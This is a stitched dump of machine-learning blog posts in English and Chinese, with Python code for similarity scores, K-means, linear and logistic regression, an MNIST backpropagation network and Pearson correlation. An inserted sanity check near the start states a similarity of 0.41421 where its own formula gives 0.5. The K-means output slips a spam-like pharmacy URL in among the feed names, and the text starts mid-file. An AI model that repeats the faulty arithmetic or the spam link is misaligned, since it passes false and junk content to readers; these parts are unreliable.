127 | ``` 128 |   Above are the computed user similarities. 129 |   [Source code](https://github.com/linghuazaii/Machine-Learning/tree/master/recommendation) 130 | 131 | ### Summary 132 |   **GOOD LUCK, HAVE FUN!** 133 | 
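The similarity table above is this distance-to-similarity transformation applied pairwise. A minimal sketch, assuming the ratings are stored in a nested dict like the first JSON block and comparing only the movies both users rated:

```python
from math import sqrt

def euclidean_similarity(prefs, a, b):
    # Compare only items rated by both users.
    shared = [item for item in prefs[a] if item in prefs[b]]
    if not shared:
        return 0.0  # no overlap: treat as no similarity
    dist = sqrt(sum((prefs[a][item] - prefs[b][item]) ** 2 for item in shared))
    return 1.0 / (1.0 + dist)

# The two-movie example from the post: distance = sqrt(9.64) ≈ 3.104835
prefs = {
    'me':  {'The Truman Show': 9.0, 'The Shawshank Redemption': 9.8},
    'you': {'The Truman Show': 6.0, 'The Shawshank Redemption': 9.0},
}
print(euclidean_similarity(prefs, 'me', 'you'))  # ≈ 0.2436
```

Note the sanity check against the table: Lisa Rose vs. Mick LaSalle differ by 0.5 on exactly four movies, so their similarity is `1 / (1 + sqrt(4 * 0.25))` = 0.41421..., matching the value above.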
-------------------------------------------------------------------------------- /machine-learning-k-means.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]K-Means 2 | ========================== 3 | 4 | ### K-means 5 |   The previous post introduced word vectors, which have one obvious drawback: when the dataset gets large, the amount of computation is staggering. This chapter introduces K-means, whose principle is fairly simple. For example, to cluster 50 news RSS feeds into K groups (say 5), generate 5 random vectors, then compute the Pearson distance between each of the 50 feeds and each of the 5 random vectors; this first round assigns every feed to one of the 5 clusters. The "means" refers to the centroid: take the mean of each of the 5 groups as 5 new vectors, then recompute the distances and reassign. Repeat this iteration until the resulting clusters no longer change. As shown: 6 |     7 | 8 | ### Example 9 | [k_means_cluster.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/k_means_cluster.py) 10 | ```python 11 | #!/bin/env python 12 | # -*- coding: utf-8 -*- 13 | # This file is auto-generated. Edit it at your own peril. 14 | from math import sqrt 15 | import random 16 | 17 | def readfile(filename): 18 | lines = [line for line in file(filename)] 19 | colnames = lines[0].strip().split('\t')[1:] 20 | rownames = [] 21 | data = [] 22 | for line in lines[1:]: 23 | p = line.strip().split('\t') 24 | rownames.append(p[0]) 25 | data.append([float(i) for i in p[1:]]) 26 | 27 | return rownames, colnames, data 28 | 29 | def pearson(v1, v2): 30 | sum1 = sum(v1) 31 | sum2 = sum(v2) 32 | 33 | sum1Sq = sum([pow(v, 2) for v in v1]) 34 | sum2Sq = sum([pow(v, 2) for v in v2]) 35 | 36 | pSum = sum([v1[i] * v2[i] for i in range(len(v1))]) 37 | num = pSum - (sum1 * sum2 / len(v1)) 38 | den = sqrt((sum1Sq - pow(sum1, 2) / len(v1)) * (sum2Sq - pow(sum2, 2) / len(v1))) 39 | if den == 0: 40 | return 0 41 | 42 | return 1.0 - num / den 43 | 44 | def kcluster(rows, distance = pearson, k = 7): 45 | ranges = [(min([row[i] for row in rows]), max([row[i] for row in rows])) for i in range(len(rows[0]))] 46 | # Create k random centroids 47 | clusters = [[random.random() * (ranges[i][1] - ranges[i][0]) + ranges[i][0] for i in range(len(rows[0]))] for j in range(k)] 48 | 49 | last_matches = None 50 | for t in range(100): 51 | 
print 'Iteration %d' % t 52 | best_matches = [[] for i in range(k)] 53 | 54 | for j in range(len(rows)): 55 | row = rows[j] 56 | best_match = 0 57 | for i in range(k): 58 | d = distance(clusters[i], row) 59 | if d < distance(clusters[best_match], row): 60 | best_match = i 61 | best_matches[best_match].append(j) 62 | 63 | if best_matches == last_matches: 64 | break 65 | last_matches = best_matches 66 | 67 | for i in range(k): 68 | avgs = [0.0] * len(rows[0]) 69 | if len(best_matches[i]) > 0: 70 | for row_id in best_matches[i]: 71 | for m in range(len(rows[row_id])): 72 | avgs[m] += rows[row_id][m] 73 | for j in range(len(avgs)): 74 | avgs[j] /= len(best_matches[i]) 75 | clusters[i] = avgs 76 | 77 | return best_matches 78 | 79 | def print_cluster(clusters, blognames): 80 | for i in range(len(clusters)): 81 | print "{" 82 | for j in clusters[i]: 83 | print "\t%s," % blognames[j] 84 | print "}" 85 | 86 | 87 | def create_cluster(): 88 | blognames, words, data = readfile('blogdata.txt') 89 | kclust = kcluster(data) 90 | print_cluster(kclust, blognames) 91 | 92 | 93 | def main(): 94 | create_cluster() 95 | 96 | if __name__ == "__main__": 97 | main() 98 | ``` 99 | 100 | **Result**: 101 | ``` 102 | { 103 | sites.google.com/view/kamagratablette/, 104 | BBC News - Technology, 105 | David Kleinert Photography, 106 | Techlearning RSS Feed, 107 | } 108 | { 109 | NASA Image of the Day, 110 | } 111 | { 112 | ASCD SmartBrief, 113 | CBNNews.com, 114 | GANNETT Syndication Service, 115 | } 116 | { 117 | Reuters: U.S., 118 | NYT > Home Page, 119 | News : NPR, 120 | Reuters: Top News, 121 | Reuters: World News, 122 | } 123 | { 124 | Education : NPR, 125 | Technology : NPR, 126 | WIRED, 127 | UEN News, 128 | } 129 | { 130 | Nature - Issue - nature.com science feeds, 131 | NOVA | PBS, 132 | Latest Science News -- ScienceDaily, 133 | Resources » Surfnetkids, 134 | Movies : NPR, 135 | Utah.gov News Provider, 136 | PCWorld, 137 | BBC News - Business, 138 | The Daily Puppy | Pictures of 
Puppies, 139 | Animal of the day, 140 | Latest News Articles from Techworld, 141 | Utah Jazz, 142 | Dictionary.com Word of the Day, 143 | Macworld, 144 | } 145 | { 146 | FRONTLINE - Latest Stories, 147 | Utah - The Salt Lake Tribune, 148 | Utah, 149 | Arts & Life : NPR, 150 | BBC News - US & Canada, 151 | Latest News, 152 | AP Top Science News at 6:06 a.m. EDT, 153 | BBC News - Home, 154 | Fresh Air : NPR, 155 | NYT > Sports, 156 | AP Top Sports News at 2:56 a.m. EDT, 157 | CNN.com - RSS Channel - HP Hero, 158 | KSL / Utah / Local Stories, 159 | AP Top U.S. News at 3:16 a.m. EDT, 160 | NYT > Technology, 161 | Yahoo News - Latest News & Headlines, 162 | } 163 | ``` 164 |   The resulting clusters are not all that accurate. 165 | 166 | ### Reference 167 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 168 | 169 | ### Summary 170 |   **GOOD LUCK, HAVE FUN!** 171 | -------------------------------------------------------------------------------- /machine-learning-linear-regression-calculation.md: -------------------------------------------------------------------------------- 1 | Linear Regression via Matrix Computation 2 | ========================= 3 | 4 | # Preface 5 |   In the Coursera course, Andrew Ng gives the matrix form of linear regression directly, without proof; this post sketches a simple derivation. 6 | 7 | # History of Linear Regression 8 |   As early as the beginning of the nineteenth century, Gauss published the [method of least squares](https://en.wikipedia.org/wiki/Least_squares); deriving step by step from Gauss's formulation yields linear regression, as follows: 9 |   10 |   For how to take matrix derivatives, see: [Matrix Differentiation](http://www.atmos.washington.edu/~dennis/MatrixCalculus.pdf) 11 |   The resulting matrix θ is the trained model, a `p x 1` matrix; for prediction, `y = Xθ` yields all predicted values at once. 12 |   The training time complexity works out to `max(O(n*p), O(p^3))`, so when the data does not have too many features, say 10,000, the computation is on the order of 10^12 operations; personalized recommendation and search rarely involve more features than that, so the direct matrix computation is fast and convenient. When there are very many features, use the iterative method introduced in the previous [post](https://github.com/linghuazaii/blog/wiki/Linear-Regression%28%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92%29) instead. 13 | 14 | 15 | # Summary 16 | **GOOD LUCK, HAVE FUN!** 17 | -------------------------------------------------------------------------------- 
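For a single feature, the least-squares solution the post derives (the normal-equation form `θ = (XᵀX)⁻¹Xᵀy`) collapses to a closed form that needs no matrix library. A minimal sketch; the sample points and the names `least_squares`, `k`, `b` are illustrative, not from the original code:

```python
def least_squares(xs, ys):
    # Closed-form least squares for y = b + k*x:
    #   k = cov(x, y) / var(x),  b = mean(y) - k * mean(x)
    # Assumes the xs are not all identical (var(x) != 0).
    n = len(xs)
    mx = sum(xs) / n
    my = sum(ys) / n
    k = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sum((x - mx) ** 2 for x in xs)
    b = my - k * mx
    return k, b

# Points lying exactly on y = 2x + 1 recover the parameters exactly.
k, b = least_squares([0, 1, 2, 3], [1, 3, 5, 7])
print(k, b)  # 2.0 1.0
```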
/machine-learning-linear-regression.md: -------------------------------------------------------------------------------- 1 | Linear Regression(线性回归) 2 | ========================== 3 | 4 | # 前言 5 |   本文所有测试数据来自于[Kaggle](https://www.kaggle.com/),图形使用[matplotlib](https://matplotlib.org)绘制,数学公式来自于[hostmath](http://www.hostmath.com/) 6 | 7 | # Linear Regression 8 |   在统计学上,线性回归被用来对一个因变量y和多个自变量x1, x2, x3 ...之间的联系建立线性模型。在推荐系统里,用来建模做预测。比如说一个卖房子的网站,将房子的信息抽象成许多特征,其中包括房子价格,如果给定一个房子需要预测价格的话, 其中价格就是y,其他特征就是x1, x2, x3 ... 先看一个简单的例子,只有一个特征。 9 | 10 | # Simple Linear Regression 11 |   先看如下数据: 12 |  [train.csv](https://github.com/linghuazaii/Machine-Learning/blob/master/linear_regression/train.csv) 13 |   14 |   现在需要根据这组数据求出y和x的关系函数,先了解一下[Mean Squared Error](https://en.wikipedia.org/wiki/Mean_squared_error) 15 | 16 | # Mean Squared Error 17 |   [Mean Squared Error](https://en.wikipedia.org/wiki/Mean_squared_error), 在统计学上用来衡量估算函数的质量。如上例子,可知估算函数是一个线性函数,如下: 18 |   19 |   MSE的计算函数如下: 20 |   21 |   MSE的值越小,表示该估算函数越准确,以上多出来的`1/2`是为了便于做Gradient Descent。那么怎样调整θ的值使得MSE的值最小呢?先看一个简单的例子。 22 | 23 | # 例子 24 |   如下例子,我们给出`y = x`上的三个点,不同的θ值得到的MSE的值是怎样的呢? 25 |   26 |   MSE值如图,图中的cost即为MSE: 27 |   28 |   这是cost和θ取值的关系图,可知θ取1的时候,MSE最小,即求`d(MSE) / d(θ) = 0`时θ的值,但是电脑只会计算,不会解方程,而且`y = kx + b`会让问题变得更复杂,这样就有了一个方法去计算参数的值: [Gradient Descent](https://en.wikipedia.org/wiki/Gradient_descent).
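  上面三个点的例子可以用几行代码直观验证。下面是一个示意的sketch,三个点`(1,1)`,`(2,2)`,`(3,3)`是为演示构造的假设数据,模型取最简单的`y = θx`:

```python
# 假设的三个样本点, 都落在 y = x 上
points = [(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)]

# 与文中公式一致, 带1/2系数的MSE
def mse(theta):
    m = len(points)
    return sum((theta * x - y) ** 2 for x, y in points) / (2.0 * m)

# 对若干theta取值比较cost, theta = 1 时MSE最小
costs = {theta: mse(theta) for theta in (0.0, 0.5, 1.0, 1.5, 2.0)}
best_theta = min(costs, key=costs.get)
```

  运行后`best_theta`为`1.0`,`mse(1.0)`为`0`,与图中cost曲线在θ取1处取最小值是一致的。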
29 | 30 | # Gradient Descent 31 |   [Gradient Descent](https://en.wikipedia.org/wiki/Gradient_descent)是一个通过不断迭代的方式去求函数极值的算法。对于: 32 |   33 |   其中α表示learning rate,这样就可以通过不断调整θ的值使得`d(MSE) / d(θ) = 0`,最终`θ(n) = θ(n) - 0 = θ(n)`,求出了MSE的极小值,同时也得到了`θ(n)`的值。由于`θ(1...n)`是彼此独立的,所以写代码的时候注意每一次迭代,它们的值都要根据上一次迭代的结果计算。learning rate控制着每一步gradient descent的步长,如果learning rate过大,得到的结果是这样的: 34 |   35 |   迭代求得的导数越来越大,最终得到的全是`inf`,得不到极小值。 36 | 37 | # 本例 38 |   对于本例,估算函数和Gradient Descent是这样的: 39 |   40 |   代码如下: 41 | ```python 42 | # cost 函数,即 MSE 43 | def cost(data, fx, k, b): 44 | cost_val = Decimal(0.0) 45 | for point in data: 46 | cost_val += pow(fx(k, b, point[0]) - point[1], 2) 47 | cost_val /= 2 * len(data) 48 | return cost_val 49 | 50 | # d(cost) / d(k) 51 | def derivate_k(data, fx, k, b): 52 | d = Decimal(0.0) 53 | for point in data: 54 | d += fx(k, b, point[0]) - point[1] 55 | d /= len(data) 56 | return d 57 | 58 | # d(cost) / d(b) 59 | def derivate_b(data, fx, k, b): 60 | d = Decimal(0.0) 61 | for point in data: 62 | d += (fx(k, b, point[0]) - point[1]) * point[0] 63 | d /= len(data) 64 | return d 65 | 66 | # loop 直到cost值的变化趋向于一个非常小的值 67 | def calc_line_function(data, learn_rate): 68 | ''' 69 | cost = 1/(2m) * E(1->m)(Y(i) - y(i))^2 70 | Y(i) = k + b * x(i) 71 | cost(k)' = d(cost)/d(k) = 1/m * E(1->m)(Y(i) - y(i)) 72 | cost(b)' = d(cost)/d(b) = 1/m * E(1->m)((Y(i) - y(i)) * x(i)) 73 | for gradient descent, a means learning rate.
74 | update k: 75 | k = k - a * cost(k)' 76 | b = b - a * cost(b)' 77 | ''' 78 | k = Decimal(0.0) 79 | b = Decimal(0.0) 80 | a = Decimal(learn_rate) 81 | fx = lambda m, n, x: (m + n * x) 82 | last_cost = cost(data, fx, k, b) 83 | while True: 84 | new_k = k - a * derivate_k(data, fx, k, b) 85 | new_b = b - a * derivate_b(data, fx, k, b) 86 | k = new_k 87 | b = new_b 88 | new_cost = cost(data, fx, k, b) 89 | #print "k:%s b:%s %s" % (k, b, math.fabs(new_cost - last_cost)) 90 | print "k:%s b:%s %s" % (k, b, new_cost) 91 | if math.fabs(new_cost - last_cost) <= 0.0001: 92 | return k, b 93 | last_cost = new_cost 94 | ``` 95 |   本例所得结果如图: 96 |   97 |   所有代码见 [linear regression code](https://github.com/linghuazaii/Machine-Learning/tree/master/linear_regression) 98 | 99 | # Reference 100 | - [Andrew NG Coursera](https://www.coursera.org/learn/machine-learning/home/welcome) 101 | 102 | # More 103 |   Gradient Descent求得的值是局部最优解,并非全局最优解。 104 |   对于linear regression,`y = k*x + b`的情况,`cost(k, b)`是一个三维的图,对于更多的变量,则维度更高,无法呈现。如图,即bowl-shape: 105 |   106 |   你可能会问,如果图是这样的,那么得到的只是局部最优解,但是对于linear regression,都是bowl-shape,即这个局部最优解,就是全局最优解: 107 |   108 |   针对上图,如果要获得全局最优解也是有办法的,以前的博文里也有说过,即[Simulated Annealing](https://en.wikipedia.org/wiki/Simulated_annealing) 109 | 110 | # 小结 111 |   有例子和代码能给人更直观的感受,只看是没多大用的。**GOOD LUCK,HAVE FUN!** 112 | -------------------------------------------------------------------------------- /machine-learning-logistic-regression.md: -------------------------------------------------------------------------------- 1 | Andrew NG. 
Logistic Regression小结与示例 2 | ======================================== 3 | 4 | ### Logistic Regression 5 |   在统计学上,Logistic Regression的例子有不少,虽然叫Regression,其实是Supervised Classification。举个教科书上经常举的例子,就是给定一堆肿瘤的数据,然后根据这些数据去预测未来的肿瘤是良性还是恶性。再具体一点比如说肿瘤的大小,患者年龄,肿瘤良性/恶性,给定肿瘤大小和患者年龄,如何预测肿瘤是良性还是恶性的问题。这就属于一个classification的问题。看下图: 6 |   7 |   数据有三个特征,`grade1`, `grade2`, 以及`positive/negative`,Logistic Regression就是用来将数据进行分类,找boundary。 8 | 9 | ### 理论 10 |   和Linear Regression不同的是,我们的`h(x)`变了。因为预测结果只有0和1,`h(x)`如下: 11 | 12 |   这个是`g(x) = 1 / (1 + e^-x)`的图像: 13 |   14 |   Cost函数的导数如下: 15 |   16 |   和Linear Regression的导数形式一样,但是不可以通过`(X'X)^-1X'Y`的方式计算β数组。证明过程见:[derivative of cost function for Logistic Regression](https://math.stackexchange.com/questions/477207/derivative-of-cost-function-for-logistic-regression). 17 |   由于选择不同的训练模型得到的结论还是差距很大的,而且现实生活中不像例子一样可以很直观的通过图像去感受,由于特征过多,而且选取也不同,所以就有了Regularized Logistic Regression,它的Cost函数如下: 18 |   19 |   导数如下: 20 |   21 | 22 | ### 具体的例子 23 |   给定一组测试数据[data.csv](https://github.com/linghuazaii/Machine-Learning/blob/master/logistic_regression/data.csv),由于R画图比较方便省事,所以我们先用R看一下数据的整体分布,然后再整Python代码。如果你的R没有安装`lattice`包,可以先装一个: 24 | ```r 25 | install.packages('lattice') 26 | ``` 27 |   我也不了解R,它的各种plot库非常繁杂,这个库也是我随便找的一个,然后plot数据。 28 | ```r 29 | require('lattice') 30 | data = read.csv('data.csv', header=TRUE) 31 | attach(data) 32 | xyplot(grade1 ~ grade2, data, groups = label, pch = 20) 33 | ``` 34 |   数据分布如下图: 35 |   36 |   可以看出近似可以用一条直线来分割两类数据,这样的话训练模型为`f(x) = a + bx1 + cx2`,其实这条线还是有一个弧度的,所以也可以取训练模型为`f(x) = a + bx1 + cx2 + dx1x2`,这样分类更加准确,但是可能引起overfit的问题,我们通过调整λ值来微调。本例两种模型都实现了。 37 | 38 | ### 代码 39 | load数据 40 | ```python 41 | def load_data(data_file): 42 | data = np.loadtxt(open(data_file, 'rb'), delimiter = ',', skiprows = 1, usecols = (1,2,3)) 43 | X = data[:, 0:2] 44 | #以下注释掉的行在做f(x) = a + bx1 + cx2 + dx1x2训练的时候需要取消注释 45 | #X = np.append(X, np.reshape(X[:,0] * X[:,1], (X.shape[0], 1)), axis = 1) 46 | Y = data[:, 2] 47 | Y = np.reshape(Y, (Y.shape[0],
1)) 48 | return X, Y 49 | ``` 50 | 51 | `sigmoid`函数 52 | ```python 53 | # 因为有一个log(0)的问题所以给0一个近似的极小值 54 | def sigmoid(x): 55 | rs = 1.0 / (1.0 + np.exp(-x)) 56 | for (i, j), value in np.ndenumerate(rs): 57 | if value < 1.0e-10: 58 | rs[i][j] = 1.0e-10 59 | elif value > 1.0 - 1.0e-10: 60 | rs[i][j] = 1.0 - 1.0e-10 61 | return rs 62 | ``` 63 | 64 | `cost`函数 65 | ```python 66 | # 在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候需要去掉以下的所有注释 67 | def cost(theta, x, y, lam = 0.): 68 | m = x.shape[0] 69 | theta = np.reshape(theta, (len(theta), 1)) 70 | #lamb = theta.copy() 71 | #lamb[0][0] = 0. 72 | J = (-1.0 / m) * (y.T.dot(np.log(sigmoid(x.dot(theta)))) + (1 - y).T.dot(np.log(1 - sigmoid(x.dot(theta)))))# + lam / (2 * m) * lamb.T.dot(lamb) 73 | return J[0][0] 74 | ``` 75 | 76 | `gradient`函数 77 | ```python 78 | # 在做f(x) = a + bx1 + cx2 + dx1x2x训练的时候需要去掉以下的所有注释 79 | def grad(theta, x, y, lam = 0.): 80 | m = x.shape[0] 81 | theta = np.reshape(theta, (len(theta), 1)) 82 | #lamb = theta.copy() 83 | #lamb[0][0] = 0. 
84 | grad = (1.0 / m) * (x.T.dot(sigmoid(x.dot(theta)) - y))# + (lam / m) * lamb 85 | grad = grad.flatten() 86 | return grad 87 | ``` 88 | 89 | 计算最优解 90 | ```python 91 | # 在做f(x) = a + bx1 + cx2 + dx1x2训练的时候, theta = np.random.randn(4) 92 | theta = np.random.randn(3) 93 | X_new = np.append(np.ones((X.shape[0], 1)), X, axis = 1) 94 | theta_final = opt.fmin_tnc(cost, theta, fprime = grad, args = (X_new, Y), approx_grad = True, epsilon = 0.001, maxfun = 10000) 95 | ``` 96 | 97 |   `f(x) = a + bx1 + cx2`训练的结果如下: 98 |   99 |   `f(x) = a + bx1 + cx2 + dx1x2`,`λ = 0.`时训练结果如下: 100 |   101 |   `λ = 0.1`时训练结果如下: 102 |   103 |   `λ = 2.0`时训练结果如下: 104 |   105 |   `λ = 3.0`时训练结果如下: 106 |   107 |   `λ = 4.0`时训练结果如下: 108 |   109 |   `λ = 8.0`时训练结果如下: 110 |   111 |   `λ = 16.0`时训练结果如下: 112 |   113 |   你可以将这几张图片下载到电脑上浏览,这样对不同的λ取值导致overfit和underfit会有一个很直观的感受。 114 | 115 |   [所有代码见Source Code](https://github.com/linghuazaii/Machine-Learning/tree/master/logistic_regression) 116 | 117 | ### 小结 118 | **GOOD LUCK, HAVE FUN!** 119 | -------------------------------------------------------------------------------- /machine-learning-neural-networks-digit-recognition.md: -------------------------------------------------------------------------------- 1 | Neural Networks Backpropagation做MNIST数字识别 2 | ============================================== 3 | 4 | ### Neural Networks 5 |   不同种属的生物大脑所含有的神经元数量有着显著的不同,一个成年人的大脑约含有850亿~860亿神经元,其中163亿位于大脑皮质,690亿位于小脑。相比而言,[秀丽隐杆线虫](https://en.wikipedia.org/wiki/Caenorhabditis_elegans)仅仅只有302个神经元,而[黑腹果蝇](https://en.wikipedia.org/wiki/Drosophila_melanogaster)则有约100000个神经元,并且能表现出比较复杂的行为。本例所使用的神经元数量大约只有1000个,三层神经网络,只有一层hidden layer。 6 |   对于人的大脑来说,不同的部分之间具有通用性,一个有语言障碍的人,负责语言部分的大脑会适应于其他部分的行为。就好比有的聋哑人视觉会比较好,有的盲人听觉却比常人更好,其原因就是他们的缺陷导致相应的大脑部位去适应另外的能力。 7 |   神经元的行为非常复杂,我们只抽象出我们所能理解的比较简单的一部分,但是Neural Networks对不同问题领域的适应能力和学习能力还是保留了的。一个神经元简化为树突,对应input,胞体对应`f(x)`,早期Perceptron神经元设计比较简单,`f(x) = b + W*X`,局限性比较大,只能输出`0`和`1`,不过能实现所有的门电路逻辑。后来发展为sigmoid神经元,`f(x) = 1 / (1 + 
e^-(W*X + b))`,输出是一个平滑的从0到1的S曲线。然后轴突对应output。神经元在输入达到一个阈值的时候才会被激发,这样通过动态调整weights和biases来控制Neural Networks的神经元行为进而学习一个问题领域。下面是一个简单的神经网络,input layer拥有784个神经元,hidden layer有15个神经元,output layer有10个神经元: 8 |    9 | 10 | ### Weights And Biases 11 |   对于上图,如果我们有M个training data,则一次正向的传导为`sigmoid(W2 * sigmoid(W1 * R^(M*784) + b1) + b2)`,最终得到`R^(M*10)`的output矩阵,然后计算Cost,然后多次迭代得到优化后的Weights和Biases。本例用上篇提到的Stochastic Gradient Descent去找优化的解。 12 | 13 | ### Backpropagation 14 |   下面是Backpropagation的公式,我们来一一推导: 15 |    16 |    17 | 18 | ### MNIST 19 |   [MNIST](http://yann.lecun.com/exdb/mnist/)包含手写的数字,有60000条training data,10000条test data。下面的图片提取自MNIST: 20 |    21 |   22 |   23 |   24 |   25 |   26 |   27 |   28 |   29 |   30 |   31 |  提取training data 32 | ```python 33 | def load_train_data(): 34 | fimg = gzip.open('train-images-idx3-ubyte.gz', 'rb') 35 | flabel = gzip.open('train-labels-idx1-ubyte.gz', 'rb') 36 | magic_img, total_img, rows, cols = struct.unpack('>IIII', fimg.read(16)) 37 | magic_label, total_label = struct.unpack('>II', flabel.read(8)) 38 | train_data = list() 39 | for i in xrange(total_img): 40 | img = np.reshape(np.fromstring(fimg.read(rows * cols), dtype = np.uint8), (rows * cols, 1)) 41 | train_data.append(img) 42 | train_label = vectorize_result(np.fromstring(flabel.read(total_label), dtype = np.uint8)) 43 | train = zip(train_data, train_label) 44 | 45 | fimg.close() 46 | flabel.close() 47 | 48 | return train 49 | ``` 50 | 51 |  提取test data 52 | ```python 53 | def load_test_data(): 54 | fimg = gzip.open('t10k-images-idx3-ubyte.gz', 'rb') 55 | flabel = gzip.open('t10k-labels-idx1-ubyte.gz', 'rb') 56 | magic_img, total_img, rows, cols = struct.unpack('>IIII', fimg.read(16)) 57 | magic_label, total_label = struct.unpack('>II', flabel.read(8)) 58 | test_data = list() 59 | for i in xrange(total_img): 60 | img = np.reshape(np.fromstring(fimg.read(rows * cols), dtype = np.uint8), (rows * cols, 1)) 61 | test_data.append(img) 62 | test_label = 
np.fromstring(flabel.read(total_label), dtype = np.uint8) 63 | test = zip(test_data, test_label) 64 | 65 | fimg.close() 66 | flabel.close() 67 | 68 | return test 69 | ``` 70 | 71 | ### Neural Networks & Backpropagation 72 |  定义Neural Network 73 | ```python 74 | class NeuralNetwork(object): 75 | def __init__(self, sizes): 76 | self.num_layers = len(sizes) 77 | self.sizes = sizes 78 | self.biases = [np.random.randn(y, 1) for y in sizes[1:]] 79 | self.weights = [np.random.randn(y, x) for x, y in zip(sizes[:-1], sizes[1:])] 80 | ``` 81 | 82 |  sigmoid函数和导数 83 | ```python 84 | def sigmoid(z): 85 | for (x, y), val in np.ndenumerate(z): 86 | if val >= 100: 87 | z[x][y] = 1. 88 | elif val <= -100: 89 | z[x][y] = 0. 90 | else: 91 | z[x][y] = 1.0 / (1.0 + np.exp(-val)) 92 | 93 | return z 94 | 95 | def sigmoid_derivative(z): 96 | return sigmoid(z) * (1. - sigmoid(z)) 97 | 98 | ``` 99 | 100 |  Stochastic Gradient Descent 101 | ```python 102 | # eta is learning rate 103 | def stochasticGradientDescent(self, training_data, epochs, mini_batch_size, eta, test_data = None): 104 | if test_data: 105 | n_test = len(test_data) 106 | n_train = len(training_data) 107 | for j in xrange(epochs): 108 | random.shuffle(training_data) 109 | mini_batches = [training_data[k: k + mini_batch_size] for k in xrange(0, n_train, mini_batch_size)] 110 | for mini_batch in mini_batches: 111 | self.updateMiniBatch(mini_batch, eta) 112 | if test_data: 113 | print 'Epoch %s: %s / %s' % (j, self.evaluate(test_data), n_test) 114 | else: 115 | print 'Epoch %s complete.' 
% j 116 | 117 | def updateMiniBatch(self, mini_batch, eta): 118 | nabla_b = [np.zeros(b.shape) for b in self.biases] 119 | nabla_w = [np.zeros(w.shape) for w in self.weights] 120 | for x, y in mini_batch: 121 | delta_nabla_b, delta_nabla_w = self.backprob(x, y) 122 | nabla_b = [nb + dnb for nb, dnb in zip(nabla_b, delta_nabla_b)] 123 | nabla_w = [nw + dnw for nw, dnw in zip(nabla_w, delta_nabla_w)] 124 | self.weights = [w - (eta / len(mini_batch)) * nw for w, nw in zip(self.weights, nabla_w)] 125 | self.biases = [b - (eta / len(mini_batch)) * nb for b, nb in zip(self.biases, nabla_b)] 126 | ``` 127 | 128 |  Backpropagation 129 | ```python 130 | def backprob(self, x, y): 131 | nabla_b = [np.zeros(b.shape) for b in self.biases] 132 | nabla_w = [np.zeros(w.shape) for w in self.weights] 133 | 134 | activation = x 135 | activations = [x] 136 | zs = [] 137 | for b, w in zip(self.biases, self.weights): 138 | z = np.dot(w, activation) + b 139 | zs.append(z) 140 | activation = sigmoid(z) 141 | activations.append(activation) 142 | delta = self.cost_derivative(activations[-1], y) * sigmoid_derivative(zs[-1]) 143 | nabla_b[-1] = delta 144 | nabla_w[-1] = np.dot(delta, activations[-2].transpose()) 145 | for l in xrange(2, self.num_layers): 146 | z = zs[-l] 147 | sd = sigmoid_derivative(z) 148 | delta = np.dot(self.weights[-l + 1].transpose(), delta) * sd 149 | nabla_b[-l] = delta 150 | nabla_w[-l] = np.dot(delta, activations[-l - 1].transpose()) 151 | return (nabla_b, nabla_w) 152 | ``` 153 | 154 |   hidden layer 30个Neurons,准确率约为82%. 155 |    156 |   hidden layer 100个Neurons,准确率约为90%. 157 |   完整代码见[Digit Recognition](https://github.com/linghuazaii/digit-recognition) 158 | 159 | ### Reference 160 | - [Andrew NG. Machine Learning](https://www.coursera.org/learn/machine-learning/home/welcome) 161 | - [Michael Nielsen. 
Neural Networks And Deep Learning](http://neuralnetworksanddeeplearning.com) 162 | 163 | 164 | ### 小结 165 |   **Learning is a HOBBY!** 166 | -------------------------------------------------------------------------------- /machine-learning-pearson-correlation.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Pearson Correlation 2 | ===================================== 3 | 4 | ### Covariance 5 |   Covariance(协方差)在probability and statistics里是为了衡量两个随机变量的联合可变性,公式如下: 6 |      7 |   E(Expectation),`E(X) = Sum(X1 -> Xn) / n`,当两个随机变量X,Y,X较大的时候,Y也较大,那么`cov(X, Y)`是一个正值,表示X和Y表现的行为是相似的;反之,X较大的时候,Y较小,X较小的时候,Y较大,那么他们的行为是相反的;如果X,Y的表现没什么关系,那么`cov(X, Y) ~ 0`。但是,协方差的大小并不能解释出更多的意义。 8 | 9 | ### Standard Deviation 10 |   Standard Deviation(标准差),标准差体现一个随机变量的分布情况,如果标准差趋向于0,则该随机变量的分布比较集中,否则,则较为分散。公式如下: 11 |      12 | 13 | ### Pearson Correlation 14 |   Pearson Correlation(皮尔森相关),皮尔森相关从两个离散的随机变量里近似出一条线,这条线让所有的变量值离这条线都比较近,得到的值是从`-1 < score < 1`,`-1`表示我讨厌你,`0`表你在我这没有存在感,`1`表示我对你有兴趣。公式如下: 15 |      16 | 17 | ### Euclidean Distance的不足之处 18 |   如果我们看过的电影列表很相似,但是如果我们的个人观点都比较尖锐,那么我们给的评分可能差距很大,这样会导致Eucliean Distance的值偏大,但是事实上我们感兴趣的电影是差不多的,我们的相似性也是很大的。Pearson Correlation就可以比较适用于这种情况。 19 | 20 | ### 例子 21 | ```json 22 | { 23 | "Claudia Puig": { 24 | "Just My Luck": 3.0, 25 | "Snakes on a Plane": 3.5, 26 | "Superman Returns": 4.0, 27 | "The Night Listener": 4.5, 28 | "You, Me and Dupree": 2.5 29 | }, 30 | "Gene Seymour": { 31 | "Just My Luck": 1.5, 32 | "Lady in the Water": 3.0, 33 | "Snakes on a Plane": 3.5, 34 | "Superman Returns": 5.0, 35 | "The Night Listener": 3.0, 36 | "You, Me and Dupree": 3.5 37 | }, 38 | "Jack Matthews": { 39 | "Lady in the Water": 3.0, 40 | "Snakes on a Plane": 4.0, 41 | "Superman Returns": 5.0, 42 | "The Night Listener": 3.0, 43 | "You, Me and Dupree": 3.5 44 | }, 45 | "Lisa Rose": { 46 | "Just My Luck": 3.0, 47 | "Lady in the Water": 2.5, 48 | "Snakes on a Plane": 3.5, 49 | "Superman Returns": 3.5, 50 | "The Night 
